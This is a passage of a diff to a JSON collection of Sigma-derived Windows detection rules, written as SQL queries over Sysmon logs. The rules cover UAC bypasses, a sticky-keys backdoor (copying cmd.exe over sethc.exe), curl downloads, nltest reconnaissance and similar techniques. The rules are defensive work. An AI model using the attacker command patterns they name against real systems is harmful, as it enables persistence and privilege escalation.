"6f4191bb-912b-48a8-9ce7-682769541e6d", + "title": "Suspicious Schtasks Schedule Types", + "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "author": "frack113", + "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate script" + "Legitimate processes that run at logon. Filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND (CommandLine LIKE '% /y%' ESCAPE '\\' OR CommandLine LIKE '% -y%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_msiexec_execute_dll.yml" + "filename": "proc_creation_win_schtasks_schedule_type.yml" }, { - "title": "File Download Via Curl.EXE", - "id": "9a517fca-4ba3-4629-9278-a68694697b81", + "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", + "id": "5b768e71-86f2-4879-b448-81061cbae951", "status": "experimental", - "description": "Detects file download using curl.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity", - "The \"\\Git\\usr\\bin\\sh.exe\" process uses the \"--output\" flag to download a specific file in the temp directory with the pattern \"gfw-httpget-xxxxxxxx.txt \"" + "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -O%' ESCAPE '\\' OR CommandLine LIKE '%--remote-name%' ESCAPE '\\' OR CommandLine LIKE '%--output%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_download.yml" + "filename": "proc_creation_win_net_default_accounts_manipulation.yml" }, { - "title": "Use of VSIISExeLauncher.exe", - "id": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", + "title": "Potential Recon Activity Via Nltest.EXE", + "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "status": "experimental", - "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Craig Young, oscd.community, Georg Lauenstein", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.discovery", + "attack.t1016", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Legitimate administration use but user and host must be investigated" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VSIISExeLauncher.exe' ESCAPE '\\' OR OriginalFileName = 'VSIISExeLauncher.exe') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml" + "filename": "proc_creation_win_nltest_recon.yml" }, { - "title": "ConvertTo-SecureString Cmdlet Usage Via CommandLine", - "id": "74403157-20f5-415d-89a7-c505779585cf", + "title": "UAC Bypass Using ChangePK and SLUI", + "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "status": "test", - "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use to pass password to different powershell commands" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%ConvertTo-SecureString%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml" + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" }, { - "title": "Potential PlugX Activity", - "id": "aeab5ec5-be14-471a-80e8-e344418305c2", - "status": "test", - "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution from Suspicious Folder", + "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "status": "experimental", + "description": "Detects a suspicious execution from an uncommon folder", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.s0013", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((((((((((Image LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" + "filename": "proc_creation_win_susp_execution_path.yml" }, { - "title": "Tasks Folder Evasion", - "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", - "status": "test", - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", - "author": "Sreeman", + "title": "Suspicious Cabinet File Execution Via Msdt.EXE", + "id": "dc4576d4-7467-424f-9eee-fd2b02855fe0", + "status": "experimental", + "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", + "author": "Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.execution", - "attack.t1574.002" + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Legitimate usage of \".diagcab\" files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '% /cab %' ESCAPE '\\' OR CommandLine LIKE '% -cab %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_task_folder_evasion.yml" + "filename": "proc_creation_win_msdt_susp_cab_options.yml" }, { - "title": "Suspicious Query of MachineGUID", - "id": "f5240972-3938-4e56-8e4b-e33893176c1f", - "status": "test", - "description": "Use of reg to get MachineGuid information", - "author": "frack113", + "title": "Persistence Via Sticky Key Backdoor", + "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", + "status": "experimental", + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "author": "Sreeman", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.t1546.008", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Cryptography%' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%MachineGuid%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_machineguid.yml" + "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" }, { - "title": "Sofacy Trojan Loader Activity", - "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "title": "Suspicious Compression Tool Parameters", + "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", "status": "test", - "description": "Detects Trojan loader activity as used by APT28", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects suspicious command line arguments of common data compression tools", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.g0007", - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "car.2013-10-002", - "attack.t1218.011" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_sofacy.yml" + "filename": "proc_creation_win_susp_compression_params.yml" }, { - "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", - "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", - "status": "experimental", - "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "Potential MsiExec Masquerading", + "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "status": "test", + "description": "Detects the execution of msiexec.exe from an uncommon directory", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" + "filename": "proc_creation_win_msiexec_masquerading.yml" }, { - "title": "HackTool - Impersonate Execution", - "id": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", - "status": "experimental", - "description": "Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis", + "title": "Suspicious Regsvr32 Execution From Remote Share", + "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "status": "experimental", + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%impersonate.exe%' ESCAPE '\\' AND (CommandLine LIKE '% list %' ESCAPE '\\' OR CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% adduser %' ESCAPE '\\')) OR ((Hashes LIKE '%MD5=9520714AB576B0ED01D1513691377D01%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A358FFC1697B7A07D0E817AC740DF62%' ESCAPE '\\') OR md5 = '9520714AB576B0ED01D1513691377D01' OR sha256 = 'E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A' OR Imphash = '0A358FFC1697B7A07D0E817AC740DF62')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impersonate.yml" + "filename": "proc_creation_win_regsvr32_remote_share.yml" }, { - "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", - "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "title": "Bypass UAC via WSReset.exe", + "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", "status": "test", - "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate software creating script event consumers" + "Unknown sub processes of Wsreset.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" ], - "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + "filename": "proc_creation_win_uac_bypass_wsreset.yml" }, { - "title": "Potential Ke3chang/TidePool Malware Activity", - "id": "7b544661-69fc-419f-9a59-82ccc328f205", + "title": "DumpStack.log Defender Evasion", + "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", "status": "test", - "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", - "author": "Markus Neis, Swisscom", + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.g0004", - "attack.defense_evasion", - "attack.t1562.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" + "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" }, { - "title": "Suspicious CodePage Switch Via CHCP", - "id": "c7942406-33dd-4377-a564-0f62db0593a3", + "title": "New Port Forwarding Rule Added Via Netsh.EXX", + "id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", "status": "test", - "description": "Detects a code page switch in command line or batch scripts to a rare language", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel", "tags": [ - "attack.t1036", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - 